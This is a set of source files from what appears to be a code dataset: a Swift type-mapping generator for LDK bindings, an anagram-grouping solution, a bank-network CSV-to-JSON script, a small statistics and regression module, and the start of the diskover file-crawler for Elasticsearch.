\"LDKTwentyBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKRecoverableSignature\"):\n\t\tfn_arg = \"uint8_t (*serialized_form)[68]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKRecoverableSignature\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"serialized_form\"\n\telif fn_arg.startswith(\"LDKu8slice\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[11:] + \")[datalen]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKu8slice\"\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKCVec_u8Z\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[12:] + \")[datalen]\"\n\t\trust_obj = \"LDKCVec_u8Z\"\n\t\tswift_raw_type = rust_obj\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKTransaction \") or fn_arg == \"LDKTransaction\":\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[15:] + \")[datalen]\"\n\t\trust_obj = \"LDKTransaction\"\n\t\tswift_raw_type = rust_obj\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKCVec_\"):\n\t\tis_ptr = False\n\t\tif \"*\" in fn_arg:\n\t\t\tfn_arg = fn_arg.replace(\"*\", \"\")\n\t\t\tis_ptr = True\n\n\t\ttyn = fn_arg[8:].split(\" \")\n\t\tassert tyn[0].endswith(\"Z\")\n\t\tif tyn[0] == \"u64Z\":\n\t\t\tnew_arg = \"uint64_t\"\n\t\telse:\n\t\t\tnew_arg = \"LDK\" + tyn[0][:-1]\n\t\tfor a in tyn[1:]:\n\t\t\tnew_arg = new_arg + \" \" + a\n\t\tres = map_types_to_swift(new_arg, ret_arr_len, java_c_types_none_allowed, 
tuple_types, unitary_enums, language_constants)\n\t\tif res is None:\n\t\t\tassert java_c_types_none_allowed\n\t\t\treturn None\n\t\tif is_ptr:\n\t\t\tres.pass_by_ref = True\n\t\tif res.is_native_primitive or res.passed_as_ptr:\n\t\t\treturn TypeInfo(rust_obj=fn_arg.split(\" \")[0], swift_type=f'[{res.swift_type}]', c_ty=res.c_ty + \"Array\", passed_as_ptr=False, is_ptr=is_ptr, is_const=is_const, var_name=res.var_name,\n\t\t\t\t\t\t\tarr_len=\"datalen\", arr_access=\"data\", subty=res, is_native_primitive=False, non_nullable=non_nullable)\n\t\telse:\n\t\t\treturn TypeInfo(rust_obj=fn_arg.split(\" \")[0], swift_type=f'[{res.swift_type}]', c_ty=language_constants.ptr_arr, passed_as_ptr=False, is_ptr=is_ptr, is_const=is_const,\n\t\t\t\t\t\t\tvar_name=res.var_name, arr_len=\"datalen\", arr_access=\"data\", subty=res, is_native_primitive=False, non_nullable=non_nullable)\n\n\tis_primitive = False\n\tarr_len = None\n\tis_unary_tuple = False\n\tjava_type_plural = None\n\tif fn_arg.startswith(\"void\"):\n\t\tjava_ty = \"Void\"\n\t\tc_ty = \"void\"\n\t\tfn_arg = fn_arg[4:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"bool\"):\n\t\tjava_ty = \"boolean\"\n\t\tc_ty = \"jboolean\"\n\t\tswift_type = 'Bool'\n\t\tfn_arg = fn_arg[4:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"uint8_t\"):\n\t\tmapped_type = language_constants.c_type_map['uint8_t']\n\t\tjava_ty = mapped_type\n\t\tc_ty = \"int8_t\"\n\t\tfn_arg = fn_arg[7:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"LDKu5\"):\n\t\tmapped_type = language_constants.c_type_map['uint8_t']\n\t\tjava_ty = mapped_type\n\t\tc_ty = \"int8_t\"\n\t\tfn_arg = fn_arg[6:].strip()\n\t\trust_obj = 'LDKu5'\n\t\tis_unary_tuple = True\n\t\tarr_len = 1\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"uint16_t\"):\n\t\tmapped_type = language_constants.c_type_map['uint16_t']\n\t\tjava_ty = mapped_type\n\t\tc_ty = \"int16_t\"\n\t\tfn_arg = fn_arg[8:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"uint32_t\"):\n\t\tmapped_type = language_constants.c_type_map['uint32_t']\n\t\tjava_ty = mapped_type\n\t\tc_ty = \"int32_t\"\n\t\tfn_arg = fn_arg[8:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"uint64_t\") or fn_arg.startswith(\"uintptr_t\"):\n\t\t# TODO: uintptr_t is arch-dependent :(\n\t\tmapped_type = language_constants.c_type_map['uint64_t']\n\t\tjava_ty = mapped_type\n\t\tif fn_arg.startswith(\"uint64_t\"):\n\t\t\tc_ty = \"int64_t\"\n\t\t\tfn_arg = fn_arg[8:].strip()\n\t\telse:\n\t\t\tc_ty = \"int64_t\"\n\t\t\trust_obj = \"uintptr_t\"\n\t\t\tswift_type = 'UInt'\n\t\t\tfn_arg = fn_arg[9:].strip()\n\t\tis_primitive = True\n\telif is_const and fn_arg.startswith(\"char *\"):\n\t\tjava_ty = \"String\"\n\t\tc_ty = \"const char*\"\n\t\tswift_raw_type = 'UnsafePointer'\n\t\tfn_arg = fn_arg[6:].strip()\n\telif fn_arg.startswith(\"LDKStr\"):\n\t\tjava_ty = \"String\"\n\t\tc_ty = \"jstring\"\n\t\tfn_arg = fn_arg[6:].strip()\n\t\tarr_access = \"chars\"\n\t\tarr_len = \"len\"\n\telse:\n\t\tma = var_ty_regex.match(fn_arg)\n\t\ttype_match = ma.group(1).strip()\n\t\tname_match = ma.group(2).strip()\n\t\tif type_match in unitary_enums:\n\t\t\tjava_ty = type_match\n\t\t\tc_ty = language_constants.result_c_ty\n\t\t\tswift_type = type_match\n\t\t\tswift_raw_type = type_match\n\t\t\tfn_arg = name_match\n\t\t\trust_obj = type_match\n\t\telif type_match.startswith(\"LDKC2Tuple\"):\n\t\t\tc_ty = language_constants.ptr_c_ty\n\t\t\tjava_ty = language_constants.ptr_native_ty\n\t\t\tswift_type = type_match[3:]\n\t\t\t# 
swift_type = \"TwoTuple<\"\n\t\t\t# if not type_match in tuple_types:\n\t\t\t# \tassert java_c_types_none_allowed\n\t\t\t# \treturn None\n\t\t\t# for idx, ty_info in enumerate(tuple_types[type_match][0]):\n\t\t\t# \tif idx != 0:\n\t\t\t# \t\tswift_type = swift_type + \", \"\n\t\t\t# \tif ty_info.is_native_primitive:\n\t\t\t# \t\tif ty_info.swift_type == \"int\":\n\t\t\t# \t\t\tswift_type = swift_type + \"Integer\" # Java concrete integer type is Integer, not Int\n\t\t\t# \t\telse:\n\t\t\t# \t\t\tswift_type = swift_type + ty_info.swift_type.title() # If we're a primitive, capitalize the first letter\n\t\t\t# \telse:\n\t\t\t# \t\tswift_type = swift_type + ty_info.swift_type\n\t\t\t# swift_type = swift_type + \">\"\n\t\t\tfn_arg = name_match\n\t\t\trust_obj = type_match\n\t\t\ttake_by_ptr = True\n\t\telif type_match.startswith(\"LDKC3Tuple\"):\n\t\t\tc_ty = language_constants.ptr_c_ty\n\t\t\tjava_ty = language_constants.ptr_native_ty\n\t\t\tswift_type = type_match[3:]\n\t\t\t# swift_type = \"ThreeTuple<\"\n\t\t\t# if not type_match in tuple_types:\n\t\t\t# \tassert java_c_types_none_allowed\n\t\t\t# \treturn None\n\t\t\t# for idx, ty_info in enumerate(tuple_types[type_match][0]):\n\t\t\t# \tif idx != 0:\n\t\t\t# \t\tswift_type = swift_type + \", \"\n\t\t\t# \tif ty_info.is_native_primitive:\n\t\t\t# \t\tif ty_info.java_hu_ty == \"int\":\n\t\t\t# \t\t\tswift_type = swift_type + \"Integer\" # Java concrete integer type is Integer, not Int\n\t\t\t# \t\telse:\n\t\t\t# \t\t\tswift_type = swift_type + ty_info.java_hu_ty.title() # If we're a primitive, capitalize the first letter\n\t\t\t# \telse:\n\t\t\t# \t\tswift_type = swift_type + ty_info.swift_type\n\t\t\t# swift_type = swift_type + \">\"\n\t\t\tfn_arg = name_match\n\t\t\trust_obj = type_match\n\t\t\ttake_by_ptr = True\n\t\telse:\n\t\t\tc_ty = language_constants.ptr_c_ty\n\t\t\tjava_ty = language_constants.ptr_native_ty\n\t\t\tswift_type = type_match.replace(\"LDKCResult\", \"Result\").replace(\"LDKCOption\", \"Option\").replace(\"LDK\", \"\")\n\t\t\tfn_arg = name_match\n\t\t\trust_obj = type_match\n\t\t\ttake_by_ptr = True\n\n\tif fn_arg.startswith(\" *\") or fn_arg.startswith(\"*\"):\n\t\tfn_arg = fn_arg.replace(\"*\", \"\").strip()\n\t\tis_ptr = True\n\t\tc_ty = language_constants.ptr_c_ty\n\t\tjava_ty = language_constants.ptr_native_ty\n\n\tis_constant_size_array = TypeParsingRegeces.IS_VARIABLE_A_FIXED_SIZE_ARRAY_REGEX.match(stripped_function_argument)\n\tif is_constant_size_array is not None:\n\t\tfn_arg = is_constant_size_array.group(1)\n\t\tarray_size = int(is_constant_size_array.group(2))\n\t\tarr_len = array_size\n\t\tswift_raw_type = f'({\",\".join([mapped_type] * array_size)})'\n\n\t# TODO: remove java_hu_type vs java_type duality artifact\n\tvar_is_arr = var_is_arr_regex.match(fn_arg)\n\tif var_is_arr is not None or ret_arr_len is not None:\n\t\tassert (not take_by_ptr)\n\t\tassert (not is_ptr)\n\t\t# is there a special case for plurals?\n\t\tjava_ty = '[' + java_ty + ']'\n\t\tc_ty = c_ty + \"Array\"\n\t\tif ret_arr_len is not None and ret_arr_len.isnumeric():\n\t\t\tarray_size = int(ret_arr_len)\n\t\t\tarr_len = array_size\n\t\t\tswift_raw_type = f'({\",\".join([mapped_type] * array_size)})'\n\t\tif var_is_arr is not None:\n\t\t\tarray_size = var_is_arr.group(2)\n\t\t\tif array_size.isnumeric():\n\t\t\t\tarray_size = int(var_is_arr.group(2))\n\t\t\t\tswift_raw_type = f'({\",\".join([mapped_type] * array_size)})'\n\t\t\tif var_is_arr.group(1) == \"\":\n\t\t\t\treturn TypeInfo(rust_obj=rust_obj, swift_type=java_ty, c_ty=c_ty, 
is_const=is_const, passed_as_ptr=False, is_ptr=False, var_name=\"arg\", arr_len=var_is_arr.group(2),\n\t\t\t\t\t\t\t\tarr_access=arr_access, is_native_primitive=False, swift_raw_type=swift_raw_type, non_nullable=non_nullable, is_unary_tuple=is_unary_tuple)\n\t\t\treturn TypeInfo(rust_obj=rust_obj, swift_type=java_ty, c_ty=c_ty, is_const=is_const, passed_as_ptr=False, is_ptr=False, var_name=var_is_arr.group(1), arr_len=var_is_arr.group(2),\n\t\t\t\t\t\t\tarr_access=arr_access, is_native_primitive=False, swift_raw_type=swift_raw_type, non_nullable=non_nullable, is_unary_tuple=is_unary_tuple)\n\n\tif swift_type is None:\n\t\tswift_type = java_ty\n\treturn TypeInfo(rust_obj=rust_obj, swift_type=swift_type, c_ty=c_ty, passed_as_ptr=is_ptr or take_by_ptr, is_const=is_const, is_ptr=is_ptr, var_name=fn_arg, arr_len=arr_len, arr_access=arr_access,\n\t\t\t\t\tis_native_primitive=is_primitive, swift_raw_type=swift_raw_type, non_nullable=non_nullable, is_unary_tuple=is_unary_tuple)\n","sub_path":"src/swift_type_mapper.py","file_name":"swift_type_mapper.py","file_ext":"py","file_size_in_byte":11698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"23071442","text":"from collections import defaultdict\n\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n anagrams = defaultdict(list)\n for word in strs:\n anagrams[''.join(sorted(word))].append(word)\n return list(anagrams.values())\n","sub_path":"Algorithms/Group Anagrams.py","file_name":"Group Anagrams.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324871117","text":"import os\nimport json\nimport csv\nimport re\nfrom operator import itemgetter\n\n#saving to directory\nDIR ='data' \n\n#file title config (also allows for capitalised version)\nedgeFileName = \"matrix\"\nnodeFileName = \"bank\"\n\n#global Variables\nsectorKey = 'Sector'\nnameKey = 'Node'\ncolorKey = 'Color'\ndecimalSeparator = \".\"\nscalingForValues = 1\n\ndef gettimestamp(filename):\n thestring = filename\n timeformat = re.compile(\"20\\d\\d\\d\\d\")\n result = timeformat.search(thestring)\n if result:\n return (result.string[result.start():result.end()])\n\ndef cleaned_input(file):\n try:\n csv_input = csv.reader(file,delimiter='|')\n data=[]\n for idx,row in enumerate(csv_input):\n for item in row:\n item.replace('\"','')\n cleanedRow= row[0].split(',')\n if idx == 0:\n keyArray = cleanedRow\n else:\n valueArray = cleanedRow\n dictRow = {}\n for idx1,value in enumerate(valueArray):\n dictRow[keyArray[idx1]] = value\n #add_date(dictRow,edgeDates)\n data.append(dictRow)\n except TypeError:\n return []\n return data\n\ndef add_date(row,dateString):\n year=dateString[0:4]\n\n if dateString[4]== '0':\n month=dateString[5]\n else:\n month=dateString[4:6]\n \n formattedDate=year+'/'+month\n dateID=int(year)*12+int(month)\n\n row['date']=formattedDate\n row['dateID']=dateID\n return\n\ndef add_assetName(row,assetName):\n row['asset']=assetName\n return\n\ndef add_regionName(row,regionName):\n row['region']=regionName\n return\n\ndef read_file(file,filename,region,asset):\n data = cleaned_input(file)\n\n for row in data:\n add_date(row,gettimestamp(filename))\n add_assetName(row,asset.name)\n add_regionName(row,region.name)\n\n return data\n\ndef fix_decimals(values):\n dotValues=[]\n for val in values:\n val = str(val)\n val = val.replace(decimalSeparator,\".\")\n dotValues.append(val)\n return dotValues\n
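\n# --- worked example (editor's addition; illustrative only) ------------------\n# add_date() mutates its row in place, e.g.:\n# row = {}\n# add_date(row, '202103')\n# row -> {'date': '2021/3', 'dateID': 24255} # dateID = 2021*12 + 3\n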
\ndef check_forZeros(row,categoryKeys):\n allZeros=True\n for key in categoryKeys:\n if (row[key]>0):\n allZeros=False\n return allZeros\n return allZeros\n\ndef set_row(inputRowRaw,keys,categoryKeys):\n\n #to list\n inputRow=list(inputRowRaw.values())\n \n #create output\n outputRow={}\n outputRow['id']=str(inputRow[0])\n outputRow['name']=str(inputRow[keys.index(nameKey)])\n outputRow['sector']=str(inputRow[keys.index(sectorKey)])\n outputRow['date']=inputRowRaw['date']\n outputRow['dateID']=inputRowRaw['dateID']\n outputRow['region']=inputRowRaw['region']\n outputRow['asset']=inputRowRaw['asset']\n\n #adding categories\n for key in categoryKeys:\n val = str(inputRowRaw[key])\n val = val.replace(decimalSeparator,\".\",1)\n try:\n outputRow[key]=float(val)/scalingForValues\n except (ValueError, TypeError):\n outputRow[key]=0\n return outputRow\n\ndef set_keys():\n return ['Node','Sector','time','Assets','Liabilities','date','dateID'] \n\ndef set_categories():\n categoryKeys = ['Assets','Liabilities','no value']\n return categoryKeys\n\ndef set_dates(nodes):\n unsortedDates=[]\n unique=[]\n for node in nodes:\n if node['dateID'] not in unique:\n unsortedDates.append({'date': node['date'], 'dateID': node['dateID']})\n unique.append(node['dateID'])\n dates = sorted(unsortedDates, key=itemgetter('dateID')) \n return dates\n\ndef set_sectors(nodes):\n sectors=[]\n unique=[]\n for node in nodes:\n if node['sector'] not in unique:\n sectors.append({'sector': node['sector']})\n unique.append(node['sector'])\n sectors.append({'sector': 'all'})\n return sectors\n\ndef set_names(nodes):\n banks=[]\n unique=[]\n for node in nodes:\n if node['id'] not in unique:\n banks.append({'id': node['id']})\n unique.append(node['id'])\n return banks\n\ndef set_regions(nodes):\n banks=[]\n unique=[]\n for node in nodes:\n if node['region'] not in unique:\n banks.append({'region': node['region']})\n unique.append(node['region'])\n return banks\n\ndef set_assets(nodes):\n banks=[]\n unique=[]\n for node in nodes:\n if node['asset'] not in unique:\n banks.append({'asset': node['asset']})\n unique.append(node['asset'])\n return banks\n\ndef transform_nodes(nodes,keys):\n categoryKeys = set_categories()\n transformedNodes=[] \n for idx, row in enumerate(nodes):\n outputRow = set_row(row,keys,categoryKeys[:-1])\n allZeros = check_forZeros(outputRow,categoryKeys)\n #don't add unspecified ids or nodes for which all numeric values = 0\n if outputRow['id'] != '' and not allZeros:\n transformedNodes.append(outputRow)\n return transformedNodes\n\ndef transform_edges(edges):\n transformedEdges=[]\n\n for row in edges:\n rowValues=list(row.values())\n rowValues=fix_decimals(rowValues)\n rowKeys=list(row.keys())\n\n #source is the 0 column\n source=rowValues[0]\n region=row['region']\n asset=row['asset']\n idx=1\n\n #skipping over the first column\n while idx < len(rowKeys)-1:\n #all targets start with '_'\n if rowKeys[idx].startswith('_'):\n target = rowKeys[idx][1:]\n #only add edges not connecting node to itself\n try:\n float(rowValues[idx])\n except ValueError:\n return []\n if source != target and float(rowValues[idx]) != 0: \n transformedEdges.append({'region': region, 'asset': asset, 'from': source, 'to': target, 'absValue': int(float(rowValues[idx])/scalingForValues), 'date': row['date'], 'dateID': row['dateID']})\n idx+=1\n return transformedEdges\n\ndef upload_files():\n path=os.path.abspath(\"C:/Users/Philippa/Repo/WhomToWhom/upload_data/Data\")\n edges=[]\n nodes=[]\n #iterator 1 for all regions\n with 
os.scandir(path) as it1:\n for region in it1:\n if not region.name.startswith('.'):\n #iterator 2 for all assets\n with os.scandir(region) as it2:\n for asset in it2:\n if not asset.name.startswith('.'):\n #iterator for individual files\n for filename in os.listdir(asset):\n filepath=os.path.join(region,asset, filename)\n with open(filepath) as file:\n #collecting edge files\n if edgeFileName in filename or edgeFileName.capitalize() in filename:\n edges = edges + read_file(file,filename,region,asset)\n if nodeFileName in filename or nodeFileName.capitalize() in filename:\n nodes = nodes + read_file(file,filename,region,asset) \n\n edges=transform_edges(edges)\n nodes=transform_nodes(nodes,set_keys())\n \n #OUTPUT CHECK\n for row in edges[1:10]:\n print(row)\n for row in nodes[1:10]:\n print(row)\n \n data = [edges,nodes]\n return data\n\ndef save_data():\n # data[0]=edges, data[1]=nodes \n edges,nodes = upload_files()\n categoryKeys = set_categories()\n dates = set_dates(nodes)\n sectors = set_sectors(nodes)\n banks = set_names(nodes)\n regions = set_regions(nodes)\n assets = set_assets(nodes)\n data = {\"edges\": edges,\"nodes\":nodes, \"categoryKeys\": categoryKeys, \"dates\": dates, \"sectors\":sectors,\"banks\":banks, \"regions\": regions, \"assets\": assets}\n \n filename = 'data.json'\n with open (filename,'w') as file:\n json.dump(data,file)\n\nif __name__ == '__main__':\n save_data()\n \n \n ","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152591169","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 17 12:00:09 2020\r\n\r\n@author: victor.veiga\r\n\"\"\"\r\n\r\n\r\n\"All of the statistics functions\"\r\n\r\ndef minimo(lista: list) -> float:\r\n \"\"\"Find the smallest value in a given list. \r\n arguments:\r\n lista(list) = the list to evaluate\r\n \r\n ex: minimo([1,2,3])\r\n returns: 1\r\n \"\"\"\r\n minimo = lista[0]\r\n for i in lista:\r\n if i < minimo:\r\n minimo = i\r\n return minimo\r\n\r\ndef maximo(lista: list) -> float:\r\n \"\"\"Find the largest value in a given list. 
\r\n arguments:\r\n lista(list) = the list to evaluate\r\n \r\n ex: maximo([1,2,3])\r\n returns: 3\r\n \"\"\"\r\n maximo = lista[0]\r\n for i in lista:\r\n if i > maximo:\r\n maximo = i\r\n return maximo\r\n\r\ndef n_raiz(x, n):\r\n \"\"\"Find the n-th root of a real number.\r\n \r\n arguments:\r\n x(int) = real number whose root is wanted.\r\n n(int) = which root to compute.\r\n \r\n ex: n_raiz(16,2)\r\n returns: 4\r\n \"\"\"\r\n # the n-th root can be seen as the number raised to (1/n)\r\n return x ** (1/n)\r\n\r\ndef soma_lista(lista):\r\n \"\"\"Find the sum of a given list.\r\n \r\n arguments:\r\n lista(list) = the list to sum.\r\n \r\n ex: soma_lista([1,2,3])\r\n returns: 6\r\n \"\"\"\r\n soma = 0\r\n for item in lista:\r\n soma += item\r\n return soma\r\n\r\ndef media_lista(lista):\r\n \"\"\"Find the mean of a given list.\r\n \r\n arguments:\r\n lista(list) = the list for the mean.\r\n \r\n ex: media_lista([1,2,3])\r\n returns: 2\r\n \"\"\"\r\n media = soma_lista(lista)/len(lista)\r\n return media\r\n\r\ndef variancia(l: list) -> float:\r\n \"\"\"Find the variance of a given list.\r\n Args:\r\n l (list): list whose variance is wanted.\r\n Returns:\r\n float: variance of the given list\r\n \"\"\"\r\n media = media_lista(l)\r\n tamanho = len(l)\r\n \r\n diff_quad = [(x-media) ** 2 for x in l] \r\n soma = soma_lista(diff_quad)\r\n var = soma / (tamanho - 1) # n - 1 gives the sample variance (Bessel's correction)\r\n return var\r\n\r\n\r\ndef cova(lista1, lista2):\r\n \"\"\"Find the covariance between two lists.\r\n \r\n arguments:\r\n lista1(list) = first list.\r\n lista2(list) = second list.\r\n \r\n ex: cova([1,2,3], [3,2,1])\r\n returns: -1.0\r\n \"\"\"\r\n # here, the n in the divisor is the number of elements in the list\r\n n = len(lista1)\r\n \r\n media1 = media_lista(lista1)\r\n media2 = media_lista(lista2)\r\n \r\n # the numerator is the sum of the products (xi - xmean) * (yi - ymean)\r\n var = soma_lista([(lista1[item]-media1) * (lista2[item]-media2) for item in range(len(lista1))])\r\n \r\n # for the sample covariance, divide the result by n-1\r\n cov = (var/(n-1))\r\n return cov\r\n\r\ndef fit(x_features: list, y_target: list) -> tuple:\r\n \"\"\"Fit a simple linear regression between two lists of variables, one feature and one target.\r\n Args:\r\n x_features (list): values of the feature used for the prediction\r\n y_target (list): values of the target\r\n Returns:\r\n alpha(float): alpha parameter of the linear regression\r\n beta(float): beta parameter of the linear regression\r\n \"\"\"\r\n y_media = media_lista(y_target)\r\n x_media = media_lista(x_features)\r\n\r\n beta = cova(x_features, y_target) / variancia(x_features)\r\n alpha = y_media - (beta*x_media)\r\n return alpha, beta\r\n\r\ndef pred(alpha: float, beta: float, x_features: list) -> list:\r\n \"\"\"Make predictions from a linear fit\r\n Args:\r\n alpha(float): alpha parameter of the linear regression\r\n beta(float): beta parameter of the linear regression\r\n x_features (list): values of the feature used for the prediction\r\n Returns:\r\n list: list with the predicted values\r\n \"\"\"\r\n y_hat = [alpha + (beta*x) for x in x_features]\r\n return y_hat\r\n
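\r\n# --- usage sketch (editor's addition; illustrative values only) -------------\r\n# x = [1, 2, 3, 4]\r\n# y = [2, 4, 6, 8]\r\n# alpha, beta = fit(x, y) # -> alpha = 0.0, beta = 2.0 for this data\r\n# pred(alpha, beta, [5]) # -> [10.0]\r\n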
\r\ndef rmse(observado, previsto):\r\n \"\"\"Find the root mean squared error between two lists.\r\n \r\n arguments:\r\n observado(list) = list with the real (observed) values.\r\n previsto(list) = list with the predicted values.\r\n \r\n ex: \r\n alpha, beta = fit(dict_values['RM'], dict_values['MEDV']) \r\n previsto = pred(alpha, beta, dict_values['RM'] )\r\n observado = dict_values['MEDV']\r\n rmse(observado, previsto)\r\n returns: ******\r\n \"\"\"\r\n # first compute the mean squared error, then take its root for the rmse\r\n erro_quadratico = (soma_lista([((observado[item]-previsto[item])**2) for item in range(len(previsto))]))/len(previsto)\r\n rmse = n_raiz(erro_quadratico, 2)\r\n return rmse","sub_path":"SOURCE/AUX_LIB/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"611648810","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"diskover - Elasticsearch file system crawler\ndiskover is a file system crawler that indexes\nyour file metadata into Elasticsearch.\nSee README.md or https://github.com/shirosaidev/diskover\nfor more information.\n\nCopyright (C) Chris Park 2017\ndiskover is released under the Apache 2.0 license. See\nLICENSE for the full license text.\n\"\"\"\n\ntry:\n from elasticsearch5 import Elasticsearch, helpers, RequestsHttpConnection,\\\n Urllib3HttpConnection\nexcept ImportError:\n from elasticsearch import Elasticsearch, helpers, RequestsHttpConnection,\\\n Urllib3HttpConnection\nfrom scandir import scandir, walk, GenericDirEntry\nfrom random import randint\nfrom datetime import datetime\nfrom subprocess import Popen, PIPE\ntry:\n import queue as Queue\nexcept ImportError:\n import Queue\nimport threading\ntry:\n import configparser as ConfigParser\nexcept ImportError:\n import ConfigParser\nimport os\nimport sys\nimport imp\nimport time\nimport argparse\nimport hashlib\nimport logging\nimport base64\nimport math\nimport json\nimport socket\nimport pwd\nimport grp\nimport uuid\n\nIS_PY3 = sys.version_info >= (3, 0)\n\n# version\nDISKOVER_VERSION = '1.4.5'\n__version__ = DISKOVER_VERSION\nBANNER_COLOR = '35m'\n# totals for crawl stats output\ntotal_files = 0\ntotal_files_skipped = 0\ntotal_file_size = 0\ntotal_file_size_skipped = 0\ntotal_dupes = 0\ntotal_dirs = 0\ntotal_dirs_skipped = 0\ntotal_hash_groups = 0\ndupe_count = 0\n# dict to hold socket tasks\nsocket_tasks = {}\n# list of socket client\nclientlist = []\n# last percent for progress output\nlast_percents = 0\n# get seconds since epoch used for elapsed time\nSTARTTIME = time.time()\n# lists to hold file and dir info for reindexing (for preserving tags)\nreindex_file_list = []\nreindex_dir_list = []\n\n# plugins\nplugin_dir = os.path.dirname(os.path.realpath(__file__)) + \"/plugins\"\nmain_module = \"__init__\"\n# Stores all the dynamically loaded plugins\nplugins = []\n\n\ndef get_plugins_info():\n \"\"\"This is the get plugins info function.\n It gets a list of python plugins info (modules) in\n the plugins directory and returns the plugins information.\n \"\"\"\n plugins_info = []\n possible_plugins = os.listdir(plugin_dir)\n for i in possible_plugins:\n location = os.path.join(plugin_dir, i)\n if not os.path.isdir(location) or not main_module + \".py\" \\\n in os.listdir(location):\n continue\n info = imp.find_module(main_module, [location])\n plugins_info.append({\"name\": i, \"info\": info})\n return plugins_info\n\n\ndef load_plugins():\n \"\"\"This is the load plugins function.\n It dynamically loads the plugins and returns them in a list\n \"\"\"\n loaded_plugins = []\n plugins_info = get_plugins_info()\n for plugin_info in plugins_info:\n plugin_module = imp.load_module(main_module, *plugin_info[\"info\"])\n loaded_plugins.append(plugin_module)\n return loaded_plugins\n\n\ndef list_plugins():\n \"\"\"This is the list plugins function.\n It prints the name 
of all the available plugins\n \"\"\"\n plugins_info = get_plugins_info()\n\n for plugin_info in plugins_info:\n print(plugin_info[\"name\"])\n\n\ndef add_diskspace(path):\n \"\"\"This is the add disk space function.\n It adds total, used, free and available\n disk space for a path to ES.\n \"\"\"\n statvfs = os.statvfs(path)\n # Size of filesystem in bytes\n total = statvfs.f_frsize * statvfs.f_blocks\n # Actual number of free bytes\n free = statvfs.f_frsize * statvfs.f_bfree\n # Number of free bytes that ordinary users are allowed\n # to use (excl. reserved space)\n available = statvfs.f_frsize * statvfs.f_bavail\n used = total - free\n indextime_utc = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n data = {\n \"path\": path,\n \"total\": total,\n \"used\": used,\n \"free\": free,\n \"available\": available,\n \"indexing_date\": indextime_utc\n }\n # add to ES\n LOGGER.info('Adding disk space info to ES index')\n ES.index(index=CLIARGS['index'], doc_type='diskspace', body=data)\n\n\ndef add_crawl_stats(start, stop=None, elapsed=None):\n \"\"\"This is the add crawl stats function.\n It adds start, end, elapsed time info to ES.\n \"\"\"\n if stop:\n stop = datetime.utcfromtimestamp(stop).strftime('%Y-%m-%dT%H:%M:%S.%f')\n data = {\n \"path\": os.path.abspath(CLIARGS['rootdir']),\n \"stop_time\": stop,\n \"elapsed_time\": elapsed,\n \"indexing_date\": datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n }\n ES.index(index=CLIARGS['index'], doc_type='crawlstat_stop', body=data)\n else:\n start = datetime.utcfromtimestamp(start).strftime('%Y-%m-%dT%H:%M:%S.%f')\n data = {\n \"path\": os.path.abspath(CLIARGS['rootdir']),\n \"start_time\": start,\n \"indexing_date\": datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n }\n ES.index(index=CLIARGS['index'], doc_type='crawlstat_start', body=data)\n\n\ndef print_banner():\n \"\"\"This is the print banner function.\n It prints a random banner.\n \"\"\"\n global BANNER_COLOR\n c = randint(1, 4)\n if c == 1:\n BANNER_COLOR = '31m'\n elif c == 2:\n BANNER_COLOR = '32m'\n elif c == 3:\n BANNER_COLOR = '33m'\n elif c == 4:\n BANNER_COLOR = '35m'\n\n botbanner = \"\"\"\\033[%s\n\n ___ _ ____ _ _ ____ _ _ ____ ____ ;\n |__> | ==== |-:_ [__] \\/ |=== |--< [\"]\n ____ ____ ____ _ _ _ ___ ____ ___ /[_]\\\\\n |___ |--< |--| |/\\| |___ |==] [__] | ] [ v%s\n\n\n\\033[0m\"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n if CLIARGS['crawlbot']:\n banner = botbanner\n else:\n b = randint(1, 4)\n if b == 1:\n banner = \"\"\"\\033[%s\n\n ________ .__ __\n \\______ \\ |__| _____| | _________ __ ___________\n | | \\| |/ ___/ |/ / _ \\ \\/ // __ \\_ __ \\\\ /)___(\\\\\n | ` \\ |\\___ \\| < <_> ) /\\ ___/| | \\/ (='.'=)\n /_______ /__/____ >__|_ \\____/ \\_/ \\___ >__| (\\\\\")_(\\\\\")\n \\/ \\/ \\/ v%s \\/\n https://shirosaidev.github.io/diskover\n Crawling all your stuff.\n Support diskover on Patreon or PayPal :)\\033[0m\n\n \"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n elif b == 2:\n banner = \"\"\"\\033[%s\n\n ___ ___ ___ ___ 